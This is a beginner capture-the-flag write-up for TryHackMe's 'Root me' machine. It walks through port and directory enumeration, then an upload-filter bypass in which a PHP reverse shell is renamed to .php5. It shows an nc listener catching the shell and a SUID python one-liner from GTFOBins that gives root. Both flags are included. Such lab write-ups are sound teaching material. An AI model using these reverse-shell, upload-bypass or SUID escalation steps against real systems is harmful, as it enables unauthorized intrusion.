Root-me

Root me THM

• This is beginner level CTF, we will be learning basics of pentesting.

Type : easy

Deploy the box

• Start the machine & connect our machine to the vpn.
• I have the IP of this machine,now i will add it to my hosts file and name it as rootme.thm

rio@0xveil:~$ cat /etc/hosts           
127.0.0.1       localhost
127.0.1.1       0xveil
10.10.87.131     rootme.thm # -> this line i edit.



# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Enumeration

• First i use curl to check the website details.
• curl -v http://websitename.com will tell us about the headers & route.

rio@0xveil:~$ curl http://rootme.thm                                                                                   
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/home.css">
    <script src="js/maquina_de_escrever.js"></script>
    <title>HackIT - Home</title>
</head>
<body>
    <div class="main-div">
        <p class="title">root@rootme:~#</p>
        <p class="description">
            Can you root me?
        </p>
    </div>

    <!--  -->

    <script>
        const titulo = document.querySelector('.title');
        typeWrite(titulo);
    </script>
</body>
</html>

# i use html2text tool to see the web content into terminal.
rio@0xveil:~$ curl http://rootme.thm | html2text 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   616  100   616    0     0    895      0 --:--:-- --:--:-- --:--:--   896


root@rootme:~#
Can you root me?
                 

Web Enum.

• Whenever i look into webpage i use ctl + shift + I to check network tab for headers, from headers i found the server version and others file details fetch by webpage.

• Checking /robots.txt sitemap.txt .well-known/security.txt file is good practice when we are doing web enum.

• I use index.php & index.html to know more about the webpage technology.

• Checking source page with ctl + u will also expose more about the webpage.

• We have more tools & addon which we can use to get the technology of webpage.

Server -> Apache/2.4.29 (Ubuntu)

Ports hunting

• For ports hunting i use nc & nmap.
• With nc i connect default ports like ssh, ftp, http, etc to know the version that they are using.
• With nmap i first scan the open ports with high rate, then i use version scan to know the version of specific ports.

rio@0xveil:~$ sudo nmap --min-rate=1000 -p- rootme.thm    
Nmap scan report for rootme.thm (10.10.87.131)
Host is up (0.33s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 125.00 seconds



rio@0xveil:~$ sudo nmap -p 22,80 -sV rootme.thm 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-29 05:52 EST
Nmap scan report for rootme.thm (10.10.87.131)
Host is up (0.45s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Dir Hunting

• We have so many tools for directory hunting.

• For directory hunting i use FFUF (fast fuzz you fool) tool, which is one of my fav tool in my arsenal.

rio@0xveil:~$ ffuf -w /usr/share/wordlists/dirb/common.txt -c -u http://rootme.thm/FUZZ           

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://rootme.thm/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

.htaccess               [Status: 403, Size: 275, Words: 20, Lines: 10, Duration: 293ms]
.hta                    [Status: 403, Size: 275, Words: 20, Lines: 10, Duration: 295ms]
                        [Status: 200, Size: 616, Words: 115, Lines: 26, Duration: 394ms]
.htpasswd               [Status: 403, Size: 275, Words: 20, Lines: 10, Duration: 394ms]
css                     [Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 318ms]
index.php               [Status: 200, Size: 616, Words: 115, Lines: 26, Duration: 397ms]
js                      [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 313ms]
panel                   [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 299ms]
server-status           [Status: 403, Size: 275, Words: 20, Lines: 10, Duration: 304ms]
uploads                 [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 386ms]
:: Progress: [4614/4614] :: Job [1/1] :: 63 req/sec :: Duration: [0:00:46] :: Errors: 0 ::

• We have several file found we can check it one by one.
• here /panel looks interesting.

Exploitation

• /panel dir gives us feature to upload the file into it.
• We can upload the php file here and call it from the /upload dir.
• PHP reverse shell https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
• Change the IP & Port.
• When we try to Upload the .php file, it sanitizing the extension, so we can rename the payload to the .php5.
• If we want we can use burp or any interceptor tool but for now it’s not worth.
• After Uploading we can go to /upload and click on the payload.php5 file With NC listener open on that port.

Shell Balancing

┌──(rio㉿0xveil)-[~]
└─$ nc -lvnp 1234       
listening on [any] 1234 ...
connect to [10.9.6.58] from (UNKNOWN) [10.10.87.131] 41778
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 10:59:37 up 14 min,  0 users,  load average: 0.00, 0.37, 0.65
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'    
www-data@rootme:/$ ^Z  # Ctrl + z to go in background.
zsh: suspended  nc -lvnp 1234
                                                                                                                                      
┌──(rio㉿0xveil)-[~]
└─$ stty raw -echo;fg   # this will set the shell size according to our screen size and ; fg will get the shell background to foreground. 
[1]  + continued  nc -lvnp 1234
                               ^C
www-data@rootme:/$ ^C
www-data@rootme:/$ export TERM=xterm
www-data@rootme:/$ 
www-data@rootme:/$ 

# Now we can use ctrl + c to terminate any action inside the shell.

User flag

• User flag is inside the /var/www/ dir.
  • THM{y0u_g0t_a_sh3ll}

Privilege Escalation

• for Priv Esc we can check SUID for root that we can access.
  • find / -user root -perm -u=s 2>/dev/null this command will find the list of file which we can assess that has SUID wih root.
  • In List we found the tool python that looks interesting.
  • Checking it on GTFOBINS https://gtfobins.github.io/gtfobins/python/ found SUID.
    • python -c 'import os; os.execl("/bin/sh", "sh", "-p")' this command will give us root shell.

www-data@rootme:/home/test$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")
# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# whoami
root
# cd /root
# ls
root.txt

Root flag

• THM{pr1v1l3g3_3sc4l4t10n}

---